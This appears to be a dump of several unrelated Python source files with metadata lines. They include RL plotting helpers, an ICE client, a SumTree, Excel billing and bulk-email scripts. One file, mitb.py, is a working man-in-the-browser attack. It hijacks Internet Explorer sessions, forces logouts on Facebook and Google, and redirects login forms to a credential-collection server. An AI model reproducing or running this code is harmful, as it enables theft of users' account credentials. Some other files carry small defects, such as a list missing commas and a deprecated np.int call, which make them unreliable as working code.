    print('Calculating exact solution using monte-carlo')
    exact_model = mc.monte_carlo(num_episodes=100000)
    exact_q = exact_model.final_q
    mse = list()
    for la in lambdas:
        np.random.seed(100)  # fix same random sequence for each model
        print(f'Training SARSA({la})')
        model = alg(num_episodes=num_episodes, la=la)
        err = np.square(model.final_q - exact_q).mean()
        mse.append(err)
    pyplot.plot(lambdas, mse, 'o-')
    pyplot.xlabel("lambda")
    pyplot.ylabel("MSE")
    pyplot.title(title + f" after {num_episodes:d} episodes")
    pyplot.show()
def plot_mse_episode(alg, title, lambdas, num_episodes=10000):
    """
    Plot the per-episode MSE of SARSA for each given lambda.

    :param callable alg: Training algorithm, called as
        alg(num_episodes, la, exact_q); its model must expose a DataFrame
        `df` with "Episode" and "MSE" columns.
    :param str title: Plot title prefix.
    :param list[float] lambdas: list of lambda values
    :param int num_episodes: Number of episodes for each SARSA run
    """
    pyplot.figure()
    # 100k monte-carlo episodes serve as the "exact" Q reference.
    print('Calculating exact solution using monte-carlo ...')
    exact_model = mc.monte_carlo(num_episodes=100000)
    exact_q = exact_model.final_q
    for la in lambdas:
        print(f'Training SARSA({la})')
        np.random.seed(100)  # fix same random sequence for each model
        model = alg(num_episodes=num_episodes, la=la, exact_q=exact_q)
        pyplot.plot(model.df['Episode'], model.df['MSE'], 'o-', label='Lambda=' + str(la))
    pyplot.xlabel("Episode number")
    pyplot.ylabel("MSE")
    pyplot.legend()
    pyplot.title(title + " per episode")
    pyplot.show()
def plot_value_policy(model):
    """
    Plot the value function (3D surface) and greedy policy (heatmap) derived
    from the model's q-function.

    :param Model model: Trained model object exposing `final_q`, indexed as
        [dealer_card, player_sum, action].
    """
    # Drop the padding row/column at index 0; axis 2 is the action dimension.
    v = np.max(model.final_q[1:, 1:], axis=2)
    pi = np.argmax(model.final_q[1:, 1:], axis=2)

    # two plots side by side
    fig = pyplot.figure(figsize=(14, 8))
    ax1 = fig.add_subplot(122, projection='3d')
    ax2 = fig.add_subplot(121)

    # plot value function
    ax1.set_title("Value Function")
    ax1.set_xlabel("Player Sum")
    ax1.set_ylabel("First Dealer Card")
    ax1.set_zlabel("V")
    # Make grid offset by one to reflect card values
    x = np.arange(1, v.shape[1] + 1)
    y = np.arange(1, v.shape[0] + 1)
    x, y = np.meshgrid(x, y)
    ax1.plot_surface(x, y, v, cmap=cm.coolwarm, linewidth=0, antialiased=False)
    ax1.azim = -140
    ax1.elev = 20

    # plot policy
    ax2.set_title("Optimal Policy")
    ax2.set_xlabel("Player Sum")
    ax2.set_ylabel("First Dealer Card")
    # Align the image extent so cell centers sit on integer card values.
    centers = [1, pi.shape[1], 1, pi.shape[0]]
    dx, = np.diff(centers[:2]) / (pi.shape[1] - 1)
    dy, = -np.diff(centers[2:]) / (pi.shape[0] - 1)
    extent = [centers[0] - dx / 2, centers[1] + dx / 2, centers[2] + dy / 2, centers[3] - dy / 2]
    ax2.imshow(pi, cmap='tab10', interpolation='nearest', extent=extent)
    # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin int is the drop-in replacement.
    ax2.set_xticks(np.arange(1, pi.shape[1] + 1, dtype=int))
    pyplot.show()
def plot_rewards_dist(e, pi, reward_text='winning'):
    """
    Plot, as a heatmap over initial (player card, dealer card) states, the
    probability of the given outcome under policy *pi*, and return its mean.

    :param e: Environment exposing reward_dist(pi, reward=...).
    :param pi: Policy to evaluate.
    :param str reward_text: One of 'losing', 'winning', 'drawing'.
    :return: Mean outcome probability over all initial states.
    """
    # Map the human-readable outcome to the environment's reward value.
    reward_dict = {'losing': -1, 'winning': 1, 'drawing': 0}
    reward = reward_dict[reward_text]
    fig = pyplot.figure()
    ax = fig.add_subplot(111)
    ax.set_title(f"Probability of {reward_text} given policy and initial state")
    ax.set_xlabel("First Player Card")
    ax.set_ylabel("First Dealer Card")
    # Drop the padding row/column at index 0.
    arr_dist = e.reward_dist(pi, reward=reward)
    arr = arr_dist[1:, 1:]
    # Align the image extent so cell centers sit on integer card values.
    centers = [1, arr.shape[1], 1, arr.shape[0]]
    dx, = np.diff(centers[:2]) / (arr.shape[1] - 1)
    dy, = -np.diff(centers[2:]) / (arr.shape[0] - 1)
    extent = [centers[0] - dx / 2, centers[1] + dx / 2, centers[2] + dy / 2, centers[3] - dy / 2]
    img = ax.imshow(arr, interpolation='nearest', extent=extent) # shows first array dimension as row
    ax.set_xticks(np.arange(1, arr.shape[1] + 1, dtype=np.int))
    divider = make_axes_locatable(ax)
    cax = divider.append_axes("right", size="5%", pad=0.1)
    pyplot.colorbar(img, cax=cax)
    pyplot.show()
    return np.mean(arr)
| true |
f65598b25c1834869e7cdba471dd52bd39069465 | Python | vucalur/ICE-Sample | /client.py | UTF-8 | 3,592 | 2.71875 | 3 | [] | no_license | #!/usr/bin/python
import sys, traceback, Ice
Ice.loadSlice("./slice/MiddlewareTestbed.ice")
import MiddlewareTestbed
from MiddlewareTestbed import *
# Proxies of items this client currently holds, keyed by item name.
owned = {}
# NOTE(review): this whole script is Python 2 (print statements, raw_input,
# long); it will not run under Python 3 as-is.
def performCustomItemOperation(item):
    """Downcast *item* to its concrete slice type (via ice_isA) and run the
    type-specific interactive action."""
    if item.ice_isA("::MiddlewareTestbed::ItemA"):
        # void actionA(float a, out long b);
        item = MiddlewareTestbed.ItemAPrx.uncheckedCast(item)
        print("Recognised item A. Insert a float");
        print '>',
        line = str(raw_input()).split(' ')[0]
        a = float(line)
        print(item.ice_ids())
        print(item.ice_id())
        b = item.actionA(a)
        print("Invocation returned (out param) b: " + str(b))
    elif item.ice_isA("::MiddlewareTestbed::ItemB"):
        # float actionB(string a);
        item = MiddlewareTestbed.ItemBPrx.uncheckedCast(item)
        print("Recognised item B. Insert a string")
        print '>',
        line = str(raw_input())
        f = item.actionB(line)
        print("Invocation returned value: " + str(f))
    elif item.ice_isA("::MiddlewareTestbed::ItemC"):
        # void actionC(long aIn, out long aOut, out short b);
        item = MiddlewareTestbed.ItemCPrx.uncheckedCast(item)
        print("Recognised item C. Insert a long");
        print '>',
        aIn = long(str(raw_input()).split(' ')[0])
        aOut, b = item.actionC(aIn)
        print("Invocation returned (out param) a: " + str(aOut) + ", (out param) b: " + str(b))
    else:
        print("Unsupported dynamic type")
def performAction(item):
    """Interactive sub-menu for one owned item: name/age queries or the
    type-specific custom operation. Returns after the first valid command."""
    print("Available actions: getName(n), getAge(a), performAction(p)")
    line = ''
    while (line != None):
        print '>',
        line = str(raw_input());
        if line.startswith("n"):
            print('item name: ' + item.getName())
        elif line.startswith("a"):
            print('item age: ' + str(item.getItemAge()))
        elif line.startswith("p"):
            performCustomItemOperation(item)
        else:
            print("Unknown command. Try again")
            continue
        # Any recognised command ends the sub-menu; only unknown input loops.
        return
def run(factory):
    """Main interactive command loop against the remote item factory.

    Commands: o=list owned, a <name>=act on an owned item, c <type> <name>=
    create, t <name>=take ownership, r <name>=release. Exits only via ^C
    (KeyboardInterrupt handled by the caller).
    """
    print("Available commands: listOwned(o), action(a) <name>, create(c) <type> <name>, take(t) <name>, release(r) <name>\nTo quit: ^C")
    line = ''
    while (line != None):
        print '>',
        line = str(raw_input());
        if line.startswith("o"):
            for name in owned.keys():
                print(name)
        elif line.startswith("a "):
            try:
                name = line.split(' ')[1]
                if not name in owned:
                    print("You don't own item " + name)
                else:
                    try:
                        performAction(owned[name])
                    # NOTE(review): 'deatail' is a typo but only a local name.
                    except Exception as deatail:
                        print('Technical problem encountered: ', deatail)
            except IndexError:
                # The command was given without the required <name> argument.
                print('to few arguments')
        elif line.startswith("c "):
            try:
                typee, name = line.split(' ')[1], line.split(' ')[2]
                try:
                    factory.createItem(name, typee)
                except ItemAlreadyExists as e:
                    print(e)
            except IndexError:
                print('to few arguments')
        elif line.startswith("t "):
            try:
                name = line.split(' ')[1]
                try:
                    item = factory.takeItem(name)
                    owned[name] = item
                except (ItemNotExists, ItemBusy) as e:
                    print(e)
            except IndexError:
                print('to few arguments')
        elif line.startswith("r "):
            try:
                name = line.split(' ')[1]
                try:
                    factory.releaseItem(name)
                    del owned[name]
                except ItemNotExists as e:
                    print(e)
            except IndexError:
                print('to few arguments')
        else:
            print("Unknown command. Try again")
# Script entry: initialise Ice, resolve the factory proxy from configuration,
# run the command loop, and always tear the communicator down at the end.
status = 0
ic = None
try:
    ic = Ice.initialize(sys.argv)
    base = ic.propertyToProxy("AFactory.Proxy")
    factory = MiddlewareTestbed.AFactoryPrx.checkedCast(base)
    if not factory:
        raise RuntimeError("Invalid proxy")
    run(factory)
except KeyboardInterrupt:
    # ^C is the normal way to quit the command loop.
    print('\nQuiting...')
except:
    traceback.print_exc()
    status = 1
if ic:
    # Clean up
    try:
        ic.destroy()
    except:
        traceback.print_exc()
        status = 1
sys.exit(status)
| true |
b9bd672dd4337852c0a1982d64791eed40571269 | Python | Viktoria-payture/Geekbrains | /Lesson03/Task01.py | UTF-8 | 683 | 4.28125 | 4 | [] | no_license | """
Реализовать функцию, принимающую два числа (позиционные аргументы) и выполняющую их деление.
Числа запрашивать у пользователя, предусмотреть обработку ситуации деления на ноль.
"""
def splitting(a, b):
    """Divide *a* by *b*; on division by zero, return a Russian warning
    string instead of raising."""
    try:
        quotient = a / b
    except ZeroDivisionError:
        return "Нельзя делить на ноль!"
    return quotient
# Prompt for the two operands (Russian prompts); int() raises ValueError on
# non-numeric input.
first_number = int(input("Введите первое число: "))
second_number = int(input("Введите второе число: "))
print(splitting(first_number, second_number))
| true |
352210e470d673a16ae8c33a28d4742d106ba25f | Python | sinemsahn/pythondepo | /blackhat/9_fun_with_internet_explorer/mitb.py | UTF-8 | 4,717 | 2.578125 | 3 | [] | no_license | import win32com.client
import time
import urlparse
import urllib
data_receiver = "http://localhost:8080/" # the web server that will collect credentials harvested from the target sites
target_sites = {} # dictionary of targeted sites
target_sites["www.facebook.com"] = {"logout_url" : None, # a URL we can redirect to in order to force the user's session to log out via a GET request
                                    "logout_form" : "logout_form", # a DOM element we can submit to force a logout
                                    "login_form_index": 0, # the position, within the target domain's DOM, of the login form we will modify
                                    "owned" : False} # whether we have already harvested credentials from this site; forcing it repeatedly would make the user suspicious
target_sites["accounts.google.com"] = {"logout_url" : "https://accounts.google.com/Logout?hl=en&continue=https://accounts.google.com/ServiceLogin%3Fservice%3Dmail",
                                       "logout_form" : None,
                                       "login_form_index" : 0,
                                       "owned" : False}
def wait_for_browser(browser):
    """Block until the Internet Explorer COM object reports the page as
    fully loaded (ReadyState 4 or the string "complete")."""
    while not (browser.ReadyState == 4 or browser.ReadyState == "complete"):
        time.sleep(0.1)
    return
# use the same target for multiple Gmail domains
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
# COM class ID for Internet Explorer's window collection.
clsid='{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid) # instantiate the COM object that gives us access to every running Internet Explorer tab/instance
# NOTE(review): Python 2 script (urlparse module, urllib.quote).
while True:
    for browser in windows: # primary loop: watch the target's browser sessions for sites whose credentials we want; iterates every running IE instance, which in modern IE includes the active tabs
        url = urlparse.urlparse(browser.LocationUrl)
        if url.hostname in target_sites: # if the target visits one of our predefined sites, start the main attack logic
            if target_sites[url.hostname]["owned"]: # first check whether we already attacked this site; if so, skip it (re-forcing a logout could reveal wrong credentials anyway)
                continue
            # if there is a URL, we can just redirect
            if target_sites[url.hostname]["logout_url"]: # if the target site has a simple logout URL, force the browser to navigate to it
                browser.Navigate(target_sites[url.hostname]["logout_url"])
                wait_for_browser(browser)
            else:
                # retrieve all elements in the document; sites like Facebook require submitting a form to force a logout, so walk the DOM
                full_doc = browser.Document.all
                # iterate, looking for the logout form; once we find its registered HTML element id, force the form to submit
                for i in full_doc:
                    try:
                        # find the logout form and submit it
                        if i.id == target_sites[url.hostname]["logout_form"]:
                            i.submit()
                            wait_for_browser(browser)
                    except:
                        pass
                # now we modify the login form: after redirecting to the login page, repoint the form's endpoint at our collection server and wait for the user to log in
                try:
                    login_index = target_sites[url.hostname]["login_form_index"]
                    login_page = urllib.quote(browser.LocationUrl)
                    browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
                    target_sites[url.hostname]["owned"] = True
                    # note: we append the target site's URL to our HTTP server's URL so the server knows where to redirect the browser after collecting credentials
                except:
                    pass
    time.sleep(5)
    # wait_for_browser (above) simply waits for the browser to finish an operation such as navigating to a new page or fully loading one.
4804e6b49aab943ed10217e3ce963adcbbca8f44 | Python | dvill03/final-project-fourdudebros | /frontend/Sarcix/scripts/test_print_a_run.py | UTF-8 | 557 | 3.34375 | 3 | [] | no_license | # Program extracting all columns, row names and scores in Python script.
# All this does is read each row/column pair and the related score.
# This will be integrated into loading the database.
import xlrd
# NOTE(review): the print statement below is Python 2 syntax; this script
# will not run under Python 3 as-is.
loc = ("[insert path to this file]/analysis_530_firstpage.xlsx")
wb = xlrd.open_workbook(loc)
sheet = wb.sheet_by_index(0)
# For row 0 and column 0
# sheet.cell_value(0, 0)
# Skip the header row/column, printing "column-header row-header score".
for i in range(1, sheet.nrows):
    for j in range(1, sheet.ncols):
        print sheet.cell_value(0,j) + " " + sheet.cell_value(i, 0) + " " + str(sheet.cell_value(i, j))
| true |
ca039de2e871db354e606c84ff05f2ac63507047 | Python | SamIAm10/Bulk-Email-Sender | /src/emailer.py | UTF-8 | 861 | 3.015625 | 3 | [] | no_license | import yagmail
# enter the Gmail you are sending from
sender_email = "testemail6213@gmail.com"
# enter the names and emails you are sending to
recipients = [
('Name1', 'testemail6213@gmail.com', 'Position1')
('Name2', 'testemail5354@gmail.com', 'Position2')
]
# enter the filepaths of the files you want to attach (must prefix with "r")
files = [
r'Bulk-Email-Sender\src\test\test_file.txt',
r'Bulk-Email-Sender\src\test\test_image.jpg'
]
email = yagmail.SMTP(sender_email)
# edit your email here
for r in recipients:
email.send(
to = r[1],
# edit your title here
subject = f'Regarding position {r[2]}',
# edit your message here
contents = [f'Hello {r[0]},\n\n I am reaching out in regards to the position of {r[2]}. I hope you will consider me.\n\n Sincerely, first_name last_name'],
attachments = files
) | true |
bd7ce1443ffd8e2ae60faaa3d36bc91d954bc5c5 | Python | ArsenPetrosyanAPK/Homework.GitHub | /Lesson7.py | UTF-8 | 1,617 | 3.6875 | 4 | [] | no_license | #a = input('Please enter firt number: ')
#b = input('(+), (-), (*), (/): ')
#c = input('Please enter second number')
#if b == ('+'):
# print(int(a) + int(c))
#if b == ('-'):
# print(int(a) - int(c))
#if b == ('*'):
# print(int(a) * int(c))
#if b == ('/'):
# print(int(a) / int(c))
#import sys
#x = (5)
#print(sys.getsizeof(x))
#a = 10
#b = 10
#if b > a:
# print('b is big')
#elif a > b:
# print('a is big')
#else:
# print('a iss big')
#country = input('Which is the biggest peoples country in the world? ')
#if country == 'China' or country == 'china':
# print('you are right')
#else:
# print('its a wrong answer ')
#import random
#zar_1 = random.randint(1,6)
#zar_2 = random.randint(1,6)
#my_zar_1 = random.randint(1,6)
#my_zar_2 = random.randint(1,6)
#myresult = zar_1 + zar_2
#compresult = my_zar_1 + my_zar_2
#if myresult > compresult:
# print('You win')
#elif myresult < compresult:
# print("Computer Win")
#else:
# myresult == compresult
# print("no one is win")
#year = int(input("please enter a year"))
#if year % 400 == 0:
# print('February', year, 'has 29 days, .')
#elif year % 100 == 0 and year % 400 == 0:
# print('February', year, 'has 29 days.')
#else:
# print('February', year, 'has 28 days.')
#sxal
#god = int(input('Tari'))
#if god % 4 != 0 or god % 100 == 0 and god % 400 != 0:
# print(god,"nahanj tari chi")
#else:
# print(god, ' nahanj tari e')
#inputov kam random qani tarekan 70 ic mec te poqr
#import random as ran
#x = ran.randint(1,50)
#y = int(input('How old are you? '))
#if y > 18 and y <= 25:
# print('you are enjoyed ')
#else:
# print('You are not accept ')
| true |
4637c3f8ce8acbb576ec0410d151c59be01cfca6 | Python | InsaneLoafer/HogwartsLG4_ZT | /assignments/python_practice/first_practice/fight_game/game_fun.py | UTF-8 | 1,195 | 4.0625 | 4 | [] | no_license | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2020/10/21 10:52
# @Author : ZhangTao
# @File : game_fun.py
import random
def game_fight(enemy_hp, enemy_power):
    """Run a simple turn-based fight: both sides trade damage each round
    until one side's HP drops to zero or below (player loss wins ties)."""
    my_hp = 1000
    my_power = 200
    # Announce the enemy's stats (Chinese UI strings preserved verbatim).
    print(f'敌人的血量为{enemy_hp},敌人的攻击力为{enemy_power}')
    while True:
        my_hp -= enemy_power
        enemy_hp -= my_power
        print(my_hp)
        # Player loss is checked first, so a simultaneous KO counts as a loss.
        if my_hp <= 0:
            print(f"我的血量是{my_hp}:敌人血量{enemy_hp}我输了!")
            return
        if enemy_hp <= 0:
            print(f"我的血量{my_hp}:敌人血量{enemy_hp}我赢了")
            return
if __name__ == '__main__':
    # Build the candidate enemy HP values (910..1000) with a comprehension.
    hp = [x for x in range(910, 1001)]
    # print(hp, type(hp))  # debug: print hp and its type
    # Pick the enemy's HP at random from the candidate list.
    enemy_hp = random.choice(hp)
    # Randomly generate the enemy's attack power.
    enemy_power = random.randint(100,201)
    # Run the fight.
    game_fight(enemy_hp, enemy_power)
a84638c76bef54c5247b6690162681942490c739 | Python | dtbinh/Mocad-1 | /SCI/Simulateur/particles/Particle.py | UTF-8 | 1,373 | 2.671875 | 3 | [] | no_license | import random
from Simulateur.core.Agent import Agent
colors = ['black','red','blue','green','cyan', 'yellow', 'magenta']
colorIndex = 0
class Particle(Agent):
    """A bouncing particle: moves one Moore-neighbourhood step per tick,
    reverses direction at the environment's edges (signalled by -1 from
    getNextCoord), and swaps directions with any particle it bumps into."""

    def __init__(self, _env, _sma):
        global colors
        global colorIndex
        # Cycle through the shared palette so each new particle gets the next colour.
        chosen = colors[colorIndex]
        colorIndex = (colorIndex + 1) % len(colors)
        Agent.__init__(self, _env, _sma, chosen, "circle")
        # Start with a random one of the 8 Moore-neighbourhood directions.
        self.pasX, self.pasY = Agent.mooreNeiStep[random.randint(0, 7)]

    def decide(self):
        """One simulation step: bounce, swap, or move."""
        nx, ny = self.env.getNextCoord(self.posX, self.posY, self.pasX, self.pasY)
        if nx == -1 and ny == -1:
            self.demiTourXY()
        elif nx == -1:
            self.demiTourX()
        elif ny == -1:
            self.demiTourY()
        elif self.env.agTab[nx][ny] is not None:
            # Cell occupied: exchange velocities with the other particle.
            self.exchangeDir(self.env.agTab[nx][ny])
        else:
            self.move(self.posX, self.posY, nx, ny)

    def demiTourXY(self):
        """Reverse both velocity components (corner bounce)."""
        self.pasX *= -1
        self.pasY *= -1

    def demiTourX(self):
        """Reverse the horizontal component (vertical wall bounce)."""
        self.pasX *= -1

    def demiTourY(self):
        """Reverse the vertical component (horizontal wall bounce)."""
        self.pasY *= -1

    def exchangeDir(self, ag):
        """Swap this particle's velocity with `ag`'s."""
        self.pasX, ag.pasX = ag.pasX, self.pasX
        self.pasY, ag.pasY = ag.pasY, self.pasY

    def move(self, oldX, oldY, newPosX, newPosY):
        """Relocate on the grid and update the cached position."""
        self.env.agTab[oldX][oldY] = None
        self.env.put(self, newPosX, newPosY)
        self.posX = newPosX
        self.posY = newPosY
def highest_product_of_3(input_ints):
    """Return the largest product obtainable from any three ints in `input_ints`.

    The maximum is either the product of the three largest values, or the
    product of the two smallest values (possibly large negatives) and the
    single largest value.

    Raises:
        ValueError: if fewer than three numbers are supplied.
    """
    if len(input_ints) < 3:
        raise ValueError('Not enough numbers in list')
    ordered = sorted(input_ints)
    # Only two candidates can be the maximum after sorting.
    return max(ordered[-1] * ordered[-2] * ordered[-3],
               ordered[0] * ordered[1] * ordered[-1])
if __name__ == '__main__':
    import ast

    # SECURITY FIX: parse the test case (e.g. "[1, 2, 3]") with literal_eval
    # instead of eval() — only Python literals are accepted, so arbitrary
    # expressions typed on stdin can no longer execute.
    testcase = ast.literal_eval(input())
    try:
        print(highest_product_of_3(testcase))
    except ValueError:
        print("Not enough numbers in list")
601b9d49def3b0501fc8fce5437eb562c074f139 | Python | raoshashank/Navigation-using-DQN | /other_files/SumTree.py | UTF-8 | 3,258 | 3.328125 | 3 | [] | no_license | '''
This Sum Tree implementation is from Simonini Thomas's Deep RL course: https://github.com/simoninithomas/Deep_reinforcement_learning_Course/blob/master/Dueling%20Double%20DQN%20with%20PER%20and%20fixed-q%20targets/Dueling%20Deep%20Q%20Learning%20with%20Doom%20%28%2B%20double%20DQNs%20and%20Prioritized%20Experience%20Replay%29.ipynb
'''
import numpy as np
class SumTree:
    """Binary sum tree used by prioritized experience replay.

    The `size` leaves hold sampling priorities; every internal node stores
    the sum of its children, so the root is the total priority. Experiences
    live in a parallel `data` array: leaf at tree index ``size - 1 + i``
    corresponds to ``data[i]``.
    """

    def __init__(self, size):
        self.data_pointer = 0                       # next data slot to (over)write
        self.size = size                            # number of leaves
        self.tree = np.zeros(2 * size - 1)          # implicit binary-heap layout
        self.data = np.zeros(size, dtype=object)    # stored experiences

    def add(self, data, priority):
        """Store `data` in the next slot with `priority`, overwriting FIFO when full."""
        slot = self.data_pointer
        self.data[slot] = data
        self.update(slot + self.size - 1, priority)
        # Advance circularly: the oldest entry is replaced once the buffer is full.
        self.data_pointer = (slot + 1) % self.size

    def update(self, index, priority):
        """Set the priority at tree position `index` and propagate the delta to the root."""
        change = priority - self.tree[index]
        self.tree[index] = priority
        while index != 0:
            index = (index - 1) // 2        # parent of node i is (i - 1) // 2
            self.tree[index] += change

    def get_leaf(self, value):
        """Descend from the root by `value`; return (data, priority, leaf index).

        At each node: go left when `value` fits in the left subtree's sum,
        otherwise subtract that sum and go right.
        """
        node = 0
        while True:
            left = 2 * node + 1
            if left >= len(self.tree):      # no children -> `node` is a leaf
                break
            if value <= self.tree[left]:
                node = left
            else:
                value -= self.tree[left]
                node = left + 1
        # Leaf at tree index t maps to data index t + 1 - size.
        return self.data[node + 1 - self.size], self.tree[node], node

    def total_priority(self):
        """Total of all leaf priorities (the root value)."""
        return self.tree[0]
| true |
ceea2367345bf57bbf2860185546a40789b96490 | Python | thegraycoder/rectangles | /main.py | UTF-8 | 473 | 3.828125 | 4 | [] | no_license | from models import Point, Rectangle
if __name__ == '__main__':
    # Each rectangle is defined by the two endpoints of its top-left ->
    # bottom-right diagonal; here the second sits fully inside the first.
    outer = Rectangle(Point(0, 4), Point(4, 0))
    inner = Rectangle(Point(1, 3), Point(3, 1))
    message = ("The rectangles intersect!"
               if outer.does_intersect(inner)
               else "The rectangles do not intersect!")
    print(message)
| true |
b3110c8ea279ebd09f7fd45c442e47450e2370bd | Python | adaveniprashanth/MyData | /Python_training/INTEL_data/Dumped_from VNC/excel_extract.py | UTF-8 | 6,862 | 2.59375 | 3 | [] | no_license | import pandas as pd
import numpy as np
from openpyxl import load_workbook,Workbook
from openpyxl.styles import PatternFill,Alignment
import sys
from datetime import date
# User-facing help: third-party requirements for this script.
print("you have to install the below packages to run")
print("pandas,numpy,openpyxl and xlrd")
print("pip install pandas\npip install numpy\npip install openpyxl\npip install xlrd")
print("python script and input file should be in same folder")
# 1 = consolidated bill, 2 = JIRA submission sheet, 3 = both.
user_request= int(input("which file you wanna generate?\n 1. consolidate 2. JIRA_submission 3. both\n"))
if user_request == 3 or user_request == 1:
    # ---- Consolidated bill: one row per approved JIRA across every sheet ----
    input_filename='WW_40_43_1.xlsx'
    result_filename='consollidated_bill.xlsx'
    xL = pd.ExcelFile(input_filename)
    print("sheets in excel file are\n",xL.sheet_names)
    list_of_sheets =xL.sheet_names
    print("total no.of sheets are ",len(list_of_sheets))
    df = pd.read_excel(input_filename,sheet_name=xL.sheet_names)#accessing sheets by name
    jira_sumit_df=pd.DataFrame()
    for i in list_of_sheets:
        print("sheet name is ",i)
        l=len(df[i].iloc[:])
        #print("total rows in {0} shett are {1}".format(i,len(df[i].iloc[:,:])))
        # Keep only rows with an assignee whose "Intel Leads Approval" reads
        # "approved" (case- and whitespace-insensitive).
        for j in range(l):
            if pd.notna(df[i].loc[j,"Assignee"]) and pd.notna(df[i].loc[j,"Intel Leads Approval"]) and df[i].loc[j,"Intel Leads Approval"].strip().lower() == "approved":
            #if pd.notna(df[i].loc[j,"Assignee"]):
                print("approved jira is ",df[i].loc[j,"Key"])
                d = { "Assignee":df[i].loc[j,"Assignee"],
                      "Issue Type":df[i].loc[j,"Issue Type"],
                      "Story Points":df[i].loc[j,"Story Points"],
                      "Summary":df[i].loc[j,"Summary"],
                      "Domain":i,
                      "Key":df[i].loc[j,"Key"],
                      "Complexity":df[i].loc[j,"Complexity"]
                    }
                ser=pd.Series(d)
                # NOTE(review): DataFrame.append is deprecated in newer pandas versions.
                jira_sumit_df=jira_sumit_df.append(ser,ignore_index=True)
    df1=pd.DataFrame()
    # Fix the column order for the output sheet.
    consolidated_df = pd.concat([df1,
                                 jira_sumit_df[["Assignee"]],
                                 jira_sumit_df[["Issue Type"]],
                                 jira_sumit_df[["Story Points"]],
                                 jira_sumit_df[["Summary"]],
                                 jira_sumit_df[["Domain"]],
                                 jira_sumit_df[["Key"]],
                                 jira_sumit_df[["Complexity"]]
                                 ],axis=1)
    consolidated_df.to_excel(result_filename,sheet_name='data_set',index=False)
    wb = load_workbook(result_filename)
    #ws = wb.get_sheet_by_name("data_set")
    ws = wb["data_set"]
    #Align the cells to center
    for i in range(1,len(consolidated_df.iloc[:])+2):
        for j in range(1,len(consolidated_df.iloc[0,:])+1):
            ws.cell(row=i,column=j).alignment = Alignment(horizontal='center', vertical='center')
    #applying the colour to the column headings
    fill_cell = PatternFill(patternType='solid', fgColor='ffff00')
    for i in range(1,len(consolidated_df.iloc[0,:])+1):
        ws.cell(row=1,column=i).fill =fill_cell
    # Column 6 ("Key") becomes a clickable JIRA link.
    for i in range(2,len(consolidated_df.iloc[:])+2):
        ws.cell(row=i, column=6).hyperlink = "https://jira.devtools.intel.com/browse/"+ws.cell(row=i, column=6).value
        ws.cell(row=i, column=6).value = ws.cell(row=i, column=6).value
        ws.cell(row=i, column=6).style = "Hyperlink"
    wb.save(result_filename)
    print("total rows in ",result_filename," are ",len(consolidated_df.iloc[:])+1)#1 includes column names
    print("output file name is ",result_filename)
if user_request == 3 or user_request == 2:
    # ---- JIRA submission sheet: one billing row per approved JIRA ----
    workweek = int(input("enter the work week"))
    work_week=workweek
    year=date.today().year
    input_filename='WW_40_43_1.xlsx'
    result_file='jira_submission.xlsx'
    xL = pd.ExcelFile(input_filename)
    print("sheets in excel file are\n",xL.sheet_names)
    list_of_sheets =xL.sheet_names
    print("total no.of sheets are ",len(list_of_sheets))
    df = pd.read_excel(input_filename,sheet_name=xL.sheet_names)#accessing sheets by name
    df1 = pd.DataFrame()
    # Same approval filter as the consolidate branch above.
    for i in list_of_sheets:
        print("sheet name is ",i)
        l=len(df[i].iloc[:])
        for j in range(l):
            if pd.notna(df[i].loc[j,"Assignee"]) and pd.notna(df[i].loc[j,"Intel Leads Approval"]) and df[i].loc[j,"Intel Leads Approval"].strip().lower() == "approved":
                print("approved jira is ",df[i].loc[j,"Key"])
                # Fixed billing metadata plus this row's JIRA key.
                d = { "PONumber":int(3002139874),
                    "Vendor":"Cerium",
                    "Team":"E2E - Automation",
                    "Platform":"RAILS",
                    "SKU":"NA",
                    "WW":work_week,
                    "Year":year,
                    "JiraID":df[i].loc[j,"Key"],
                    "BillableHeader":"StoryPointSlab",
                    "Location":"SRR Bangalore",
                    "L1Approver":"Kh, Brinda",
                    "L2Approver":"Jain, Nalina"
                }
                ser=pd.Series(d)
                # NOTE(review): DataFrame.append is deprecated in newer pandas versions.
                df1=df1.append(ser,ignore_index=True)
    df2=pd.DataFrame()
    # Fix the column order for the submission layout.
    jira_submission = pd.concat([df2,
                                 df1[["PONumber"]],
                                 df1[["Vendor"]],
                                 df1[["Team"]],
                                 df1[["Platform"]],
                                 df1[["SKU"]],
                                 df1[["WW"]],
                                 df1[["Year"]],
                                 df1[["JiraID"]],
                                 df1[["BillableHeader"]],
                                 df1[["Location"]],
                                 df1[["L1Approver"]],
                                 df1[["L2Approver"]],
                                 ],axis=1)
    jira_submission.to_excel(result_file,sheet_name='data_set',index=False)
    wb = load_workbook(result_file)
    # FIX: Workbook.get_sheet_by_name() is deprecated (removed in newer
    # openpyxl); use key access, matching the consolidate branch above.
    ws = wb["data_set"]
    print("total rows are {} and total columns are {}".format(len(jira_submission.iloc[:]),len(jira_submission.iloc[0,:])))
    #Align the cells to center
    for i in range(1,len(jira_submission.iloc[:])+2):
        for j in range(1,len(jira_submission.iloc[0,:])+1):
            ws.cell(row=i,column=j).alignment = Alignment(horizontal='center', vertical='center')
    #applying the colour to the column headings
    fill_cell = PatternFill(patternType='solid', fgColor='ffff00')
    for i in range(1,len(jira_submission.iloc[0,:])+1):
        ws.cell(row=1,column=i).fill =fill_cell
    #adding the hyperlink to the cell for JIRA (column 8 = "JiraID")
    for i in range(2,len(jira_submission.iloc[:])+2):
        ws.cell(row=i, column=8).hyperlink = "https://jira.devtools.intel.com/browse/"+ws.cell(row=i, column=8).value
        ws.cell(row=i, column=8).value = ws.cell(row=i, column=8).value
        ws.cell(row=i, column=8).style = "Hyperlink"
    #save the excel file
    wb.save(result_file)
    print("total rows in ",result_file," are ",len(jira_submission.iloc[:])+1)#1 includes column names
    print("output file is ",result_file)
| true |
e07006f91c412b1d99d3609152e3f0a758e98d9b | Python | hadisamadzad/queraml | /problems/Key Compression/main.py | UTF-8 | 585 | 3.234375 | 3 | [] | no_license | from filereader import read
from filereader import readAndSplitLines
# functions
def encode(text):
    """Compress `text` into a word->id mapping plus the id sequence.

    Punctuation (``.``, ``,``, ``'``, ``-``) is stripped, the text is split on
    whitespace, and each distinct word is numbered in order of first
    appearance, starting at 1.

    Returns:
